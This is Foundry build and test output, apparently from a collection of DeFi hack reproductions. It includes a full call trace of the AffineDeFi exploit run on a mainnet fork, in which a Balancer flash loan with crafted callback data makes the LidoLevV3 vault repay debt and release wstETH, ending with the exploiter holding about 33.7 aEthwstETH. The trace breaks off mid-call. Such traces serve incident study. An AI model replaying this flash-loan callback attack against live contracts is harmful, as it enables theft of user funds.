Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.13s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/AffineDeFi_exp.sol:30:5:
   |
30 |     address WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 640.99ms (2.12ms CPU time)

Ran 1 test for src/test/2024-02/AffineDeFi_exp.sol:ExploitTest
[PASS] testExploit() (gas: 766393)
Logs:
  Exploiter aEthwstETH balance before attack: 0.000000000000000000
  Exploiter aEthwstETH balance after attack: 33.698806193381635860

Traces:
  [14797] ExploitTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19132934 [1.913e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(aEthwstETH: [0x0B925eD163218f6662a35e0f0371Ac234f9E9371], "aEthwstETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], "Balancer")
    │   └─ ← [Return]
    ├─ [0] VM::label(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], "LidoLevV3")
    │   └─ ← [Return]
    └─ ← [Stop]

  [842093] ExploitTest::testExploit()
    ├─ [23044] aEthwstETH::balanceOf(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [17992] 0x7EfFD7b47Bfd17e52fB7559d3f924201b9DbfF3d::balanceOf(ExploitTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   ├─ [10318] 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2::getReserveNormalizedIncome(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0) [staticcall]
    │   │   │   ├─ [5266] 0x5FAab9E1adbddaD0a08734BE8a52185Fd6558E14::getReserveNormalizedIncome(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0) [delegatecall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000033b9de7e3d39a6f9a7c08df
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000033b9de7e3d39a6f9a7c08df
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ [2874] aEthwstETH::decimals() [staticcall]
    │   ├─ [2357] 0x7EfFD7b47Bfd17e52fB7559d3f924201b9DbfF3d::decimals() [delegatecall]
    │   │   └─ ← [Return] 18
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Exploiter aEthwstETH balance before attack", val: 0, decimals: 18)
    ├─ [632675] Balancer::flashLoan(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [318973831042619036856 [3.189e20]], 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496)
    │   ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 55912009748616849239618 [5.591e22]
    │   ├─ [2350] 0xce88686553686DA562CE7Cea497CE749DA109f9F::getFlashLoanFeePercentage() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [27962] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 318973831042619036856 [3.189e20])
    │   │   ├─ emit Transfer(from: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], to: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], value: 318973831042619036856 [3.189e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x000000000000000000000000000000000000000000000bd6ff01d7d7e4f9ae42 → 0x000000000000000000000000000000000000000000000bc5b45b26818033598a
    │   │   │   @ 0x72abcc8c1956d2c5aceb3e4a4a26c855bc628660ed76bd1c9129d9ab812d24ea: 0 → 0x0000000000000000000000000000000000000000000000114aa6b15664c654b8
    │   │   └─ ← [Return] true
    │   ├─ [576214] LidoLevV3::receiveFlashLoan([0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [318973831042619036856 [3.189e20]], [0], 0x00000000000000000000000000000000000000000000000000000000000000010000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496)
    │   │   ├─ [17132] 0xeA51d7853EEFb32b6ee06b1C12E6dcCA88Be0fFE::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   ├─ [12080] 0xaC725CB59D16C81061BDeA61041a8A5e73DA9EC6::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   ├─ [6919] 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2::getReserveNormalizedVariableDebt(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   │   ├─ [6399] 0x5FAab9E1adbddaD0a08734BE8a52185Fd6558E14::getReserveNormalizedVariableDebt(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000035826ff2489bafa33adf90f
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000035826ff2489bafa33adf90f
    │   │   │   │   └─ ← [Return] 353976785545105115749 [3.539e20]
    │   │   │   └─ ← [Return] 353976785545105115749 [3.539e20]
    │   │   ├─ [5544] aEthwstETH::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   ├─ [4992] 0x7EfFD7b47Bfd17e52fB7559d3f924201b9DbfF3d::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   ├─ [1818] 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2::getReserveNormalizedIncome(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0) [staticcall]
    │   │   │   │   │   ├─ [1266] 0x5FAab9E1adbddaD0a08734BE8a52185Fd6558E14::getReserveNormalizedIncome(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000033b9de7e3d39a6f9a7c08df
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000033b9de7e3d39a6f9a7c08df
    │   │   │   │   └─ ← [Return] 340788235238642068114 [3.407e20]
    │   │   │   └─ ← [Return] 340788235238642068114 [3.407e20]
    │   │   ├─ [130184] 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2::repay(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 318973831042619036856 [3.189e20], 2, LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142])
    │   │   │   ├─ [129649] 0x5FAab9E1adbddaD0a08734BE8a52185Fd6558E14::repay(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 318973831042619036856 [3.189e20], 2, LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   ├─ [125503] 0x5547D7d54d10C359108e36d098016c4020443Fd4::40e95de6(0000000000000000000000000000000000000000000000000000000000000034000000000000000000000000000000000000000000000000000000000000003682b974bece31f54dd185455479045bf3d5fe6f936188dd73e07668d61e052f29000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc20000000000000000000000000000000000000000000000114aa6b15664c654b80000000000000000000000000000000000000000000000000000000000000002000000000000000000000000cd6ca2f0d0c182c5049d9a1f65cde51a706ae1420000000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   │   │   ├─ [2968] 0xeA51d7853EEFb32b6ee06b1C12E6dcCA88Be0fFE::scaledTotalSupply() [staticcall]
    │   │   │   │   │   │   ├─ [2419] 0xaC725CB59D16C81061BDeA61041a8A5e73DA9EC6::scaledTotalSupply() [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000005ff94c853621776abec3
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000005ff94c853621776abec3
    │   │   │   │   │   ├─ [9982] 0x102633152313C81cD80419b6EcF66d14Ad68949A::getSupplyData() [staticcall]
    │   │   │   │   │   │   ├─ [4921] 0x15C5620dfFaC7c7366EED66C20Ad222DDbB1eD57::getSupplyData() [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [3201] 0x102633152313C81cD80419b6EcF66d14Ad68949A::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   │   │   │   ├─ [2649] 0x15C5620dfFaC7c7366EED66C20Ad222DDbB1eD57::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [3038] 0xeA51d7853EEFb32b6ee06b1C12E6dcCA88Be0fFE::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   │   │   │   ├─ [2486] 0xaC725CB59D16C81061BDeA61041a8A5e73DA9EC6::balanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   │   │   │   ├─ [1325] 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2::getReserveNormalizedVariableDebt(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [805] 0x5FAab9E1adbddaD0a08734BE8a52185Fd6558E14::getReserveNormalizedVariableDebt(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000035826ff2489bafa33adf90f
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000035826ff2489bafa33adf90f
    │   │   │   │   │   │   │   └─ ← [Return] 353976785545105115749 [3.539e20]
    │   │   │   │   │   │   └─ ← [Return] 353976785545105115749 [3.539e20]
    │   │   │   │   │   ├─ [26087] 0xeA51d7853EEFb32b6ee06b1C12E6dcCA88Be0fFE::burn(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 318973831042619036856 [3.189e20], 1035024658069051456948664591 [1.035e27])
    │   │   │   │   │   │   ├─ [25526] 0xaC725CB59D16C81061BDeA61041a8A5e73DA9EC6::burn(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 318973831042619036856 [3.189e20], 1035024658069051456948664591 [1.035e27]) [delegatecall]
    │   │   │   │   │   │   │   ├─ [7701] 0x8164Cc65827dcFe994AB23944CBC90e0aa80bFcb::handleAction(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 453223569019806123998915 [4.532e23], 341998408236463123361 [3.419e20])
    │   │   │   │   │   │   │   │   ├─ [2675] 0xE7B67F44eA304DD7f6d215b13686637ff64CD2B2::handleAction(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 453223569019806123998915 [4.532e23], 341998408236463123361 [3.419e20]) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], to: 0x0000000000000000000000000000000000000000, value: 318944848550144700161 [3.189e20])
    │   │   │   │   │   │   │   ├─ emit Burn(param0: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param1: 0x0000000000000000000000000000000000000000, param2: 318944848550144700161 [3.189e20], param3: 28982492474336695 [2.898e16], param4: 1035024658069051456948664591 [1.035e27])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xc5a4446417df74ed5e0566b54b80821d4e335b6f7312c39070cee6a5bd20d520: 0x000000000358150d220274543e8b65ba00000000000000128a2e6c4e4b696ba1 → 0x00000000035826ff2489bafa33adf90f0000000000000001d5535af0029ef7e9
    │   │   │   │   │   │   │   │   @ 58: 0x000000000000000000000000000000000000000000005ff94c853621776abec3 → 0x000000000000000000000000000000000000000000005fe897aa24c32ea04b0b
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000005fe897aa24c32ea04b0b
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000005fe897aa24c32ea04b0b
    │   │   │   │   │   ├─ [7160] 0x06B1Ec378618EA736a65395eA5CAB69A2410493B::calculateInterestRates((0, 318973831042619036856 [3.189e20], 0, 0, 468778595722517357445717 [4.687e23], 0, 1500, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x4d5F47FA6A74757f35C14fD3a6Ef8E3C9BC514E8)) [staticcall]
    │   │   │   │   │   │   ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x4d5F47FA6A74757f35C14fD3a6Ef8E3C9BC514E8) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 143009253559093150188127 [1.43e23]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000cd4660e7e92740cb1f08c0000000000000000000000000000000000000000004c21b47d6a4f6177e9af7e00000000000000000000000000000000000000000013b568bb97eaae18239472
    │   │   │   │   │   ├─ emit ReserveDataUpdated(param0: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, param1: 15510134142072623979425932 [1.551e25], param2: 92037529835702665603559294 [9.203e25], param3: 23826270884991865922491506 [2.382e25], param4: 1019369531491344843689208548 [1.019e27], param5: 1035024658069051456948664591 [1.035e27])
    │   │   │   │   │   ├─ [8225] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transferFrom(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 0x4d5F47FA6A74757f35C14fD3a6Ef8E3C9BC514E8, 318973831042619036856 [3.189e20])
    │   │   │   │   │   │   ├─ emit Transfer(from: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], to: 0x4d5F47FA6A74757f35C14fD3a6Ef8E3C9BC514E8, value: 318973831042619036856 [3.189e20])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x72abcc8c1956d2c5aceb3e4a4a26c855bc628660ed76bd1c9129d9ab812d24ea: 0x0000000000000000000000000000000000000000000000114aa6b15664c654b8 → 0
    │   │   │   │   │   │   │   @ 0xb064600732a82908427d092d333e607598a6238a59aeb45e1288cb0bac7161cf: 0x000000000000000000000000000000000000000000001e488c13507f1aad825f → 0x000000000000000000000000000000000000000000001e59d6ba01d57f73d717
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [3136] 0x4d5F47FA6A74757f35C14fD3a6Ef8E3C9BC514E8::handleRepayment(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 318973831042619036856 [3.189e20])
    │   │   │   │   │   │   ├─ [578] 0x7EfFD7b47Bfd17e52fB7559d3f924201b9DbfF3d::handleRepayment(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 318973831042619036856 [3.189e20]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   ├─ emit Repay(param0: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, param1: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param2: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param3: 318973831042619036856 [3.189e20], param4: false)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xf81d8d79f42adb4c73cc3aa0c78e25d3343882d0313c0b80ece3d3a103ef1ec7: 0x00000000000000000000000000000000000000000000000455b045caf426f731 → 0x00000000000000000000000000000000000000000000000455f304f7a8840520
    │   │   │   │   │   │   @ 0xf81d8d79f42adb4c73cc3aa0c78e25d3343882d0313c0b80ece3d3a103ef1ec0: 0x00000000000cd8de9178580d386a8b1e00000000034b33db3ba2975be080c01f → 0x00000000000cd4660e7e92740cb1f08c00000000034b33e507c9c2422a5caae4
    │   │   │   │   │   │   @ 0xf81d8d79f42adb4c73cc3aa0c78e25d3343882d0313c0b80ece3d3a103ef1ec1: 0x000000000013b8d784c056e8bb500ba800000000035826efdf109d3f5cd62cc0 → 0x000000000013b568bb97eaae1823947200000000035826ff2489bafa33adf90f
    │   │   │   │   │   │   @ 0xf81d8d79f42adb4c73cc3aa0c78e25d3343882d0313c0b80ece3d3a103ef1ec2: 0x00000000000000000000000065bb6e0f00000000004c269be5ed3322f34dc781 → 0x00000000000000000000000065bb6f7700000000004c21b47d6a4f6177e9af7e
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000114aa6b15664c654b8
    │   │   │   │   └─ ← [Return] 318973831042619036856 [3.189e20]
    │   │   │   └─ ← [Return] 318973831042619036856 [3.189e20]
    │   │   ├─ [230564] 0x87870Bca3F3fD6335C3F4ce8392D69350B4fA4E2::withdraw(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0, 307089429045260432253 [3.07e20], LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142])
    │   │   │   ├─ [230003] 0x5FAab9E1adbddaD0a08734BE8a52185Fd6558E14::withdraw(0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0, 307089429045260432253 [3.07e20], LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   ├─ [2402] 0x2f39d218133AFaB8F2B819B1066c7E434Ad94E9e::getPriceOracle() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x54586bE62E3c3580375aE3723C145253060Ca0C2
    │   │   │   │   ├─ [216282] 0x589F82Ff8162Fa96545b435435713E9D6ca79fBB::186dea44(00000000000000000000000000000000000000000000000000000000000000340000000000000000000000000000000000000000000000000000000000000036000000000000000000000000000000000000000000000000000000000000003782b974bece31f54dd185455479045bf3d5fe6f936188dd73e07668d61e052f290000000000000000000000007f39c581f595b53c5cb19bd0b3f8da6c935e2ca0000000000000000000000000000000000000000000000010a5b8d0afe845b37d000000000000000000000000cd6ca2f0d0c182c5049d9a1f65cde51a706ae142000000000000000000000000000000000000000000000000000000000000001b00000000000000000000000054586be62e3c3580375ae3723c145253060ca0c20000000000000000000000000000000000000000000000000000000000000001) [delegatecall]
    │   │   │   │   │   ├─ [4968] 0xC96113eED8cAB59cD8A66813bCB0cEb29F06D2e4::scaledTotalSupply() [staticcall]
    │   │   │   │   │   │   ├─ [2419] 0xaC725CB59D16C81061BDeA61041a8A5e73DA9EC6::scaledTotalSupply() [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d7ff1f4a7fa717f
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d7ff1f4a7fa717f
    │   │   │   │   │   ├─ [7482] 0x39739943199c0fBFe9E5f1B5B160cd73a64CB85D::getSupplyData() [staticcall]
    │   │   │   │   │   │   ├─ [4921] 0x15C5620dfFaC7c7366EED66C20Ad222DDbB1eD57::getSupplyData() [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [1146] aEthwstETH::scaledBalanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [staticcall]
    │   │   │   │   │   │   ├─ [626] 0x7EfFD7b47Bfd17e52fB7559d3f924201b9DbfF3d::scaledBalanceOf(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000001276e4e57722ab312e
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000001276e4e57722ab312e
    │   │   │   │   │   ├─ [9660] 0x7b8Fa4540246554e77FCFf140f9114de00F8bB8D::calculateInterestRates((0, 0, 307089429045260432253 [3.07e20], 0, 4011075626650731686335 [4.011e21], 0, 1500, 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0, 0x0B925eD163218f6662a35e0f0371Ac234f9E9371)) [staticcall]
    │   │   │   │   │   │   ├─ [2534] 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0::balanceOf(aEthwstETH: [0x0B925eD163218f6662a35e0f0371Ac234f9E9371]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 837016567033426250977516 [8.37e23]
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000028e7cf6194a37766d620000000000000000000000000000000000000000003e63ac0a117aa9ac9230ef00000000000000000000000000000000000000000002766ce68fdf7f0444770c
    │   │   │   │   │   ├─ emit ReserveDataUpdated(param0: 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0, param1: 12073175036517569424738 [1.207e22], param2: 75424088663387665897500911 [7.542e25], param3: 2977099746311124134688524 [2.977e24], param4: 1000527341973624759506438367 [1e27], param5: 1004101134483577325977691581 [1.004e27])
    │   │   │   │   │   ├─ [47493] aEthwstETH::burn(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 307089429045260432253 [3.07e20], 1000527341973624759506438367 [1e27])
    │   │   │   │   │   │   ├─ [46929] 0x7EfFD7b47Bfd17e52fB7559d3f924201b9DbfF3d::burn(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 307089429045260432253 [3.07e20], 1000527341973624759506438367 [1e27]) [delegatecall]
    │   │   │   │   │   │   │   ├─ [3201] 0x8164Cc65827dcFe994AB23944CBC90e0aa80bFcb::handleAction(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 840584271767809850220061 [8.405e23], 340608618017782968622 [3.406e20])
    │   │   │   │   │   │   │   │   ├─ [2675] 0xE7B67F44eA304DD7f6d215b13686637ff64CD2B2::handleAction(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 840584271767809850220061 [8.405e23], 340608618017782968622 [3.406e20]) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], to: 0x0000000000000000000000000000000000000000, value: 307089409295028918916 [3.07e20])
    │   │   │   │   │   │   │   ├─ emit Burn(param0: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param1: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], param2: 307089409295028918916 [3.07e20], param3: 19750231513337 [1.975e13], param4: 1000527341973624759506438367 [1e27])
    │   │   │   │   │   │   │   ├─ [28068] 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0::transfer(LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], 307089429045260432253 [3.07e20])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: aEthwstETH: [0x0B925eD163218f6662a35e0f0371Ac234f9E9371], to: LidoLevV3: [0xcd6ca2f0d0c182C5049D9A1F65cDe51A706ae142], value: 307089429045260432253 [3.07e20])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xa69c31ad883ca5d0f069e8f3539b578234aa915726262552bd610e701e134b71: 0 → 0x000000000000000000000000000000000000000000000010a5b8d0afe845b37d
    │   │   │   │   │   │   │   │   │   @ 0xbb303388fb7ea20e521daeb37566c748b6cb117724b3acfa3fb984836a7ca12c: 0x00000000000000000000000000000000000000000000b13ec24f1510f2d650ec → 0x00000000000000000000000000000000000000000000b12e1c9644610a909d6f
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 54: 0x00000000000000000000000000000000000000000000b2002a287e7a70a21e1d → 0x00000000000000000000000000000000000000000000b1ef86aeb4c6d19cc345
    │   │   │   │   │   │   │   │   @ 0xdeae47ff7bd01bad86820ae7179c8488fb5c841f1c7f147b7555c5347615fc5c: 0x00000000033b9de4bf1f13373cd2049a000000000000001276e4e57722ab312e → 0x00000000033b9de7e3d39a6f9a7c08df0000000000000001d36b1bc383a5d656
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   ├─ [20142] 0x54586bE62E3c3580375aE3723C145253060Ca0C2::getAssetPrice(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
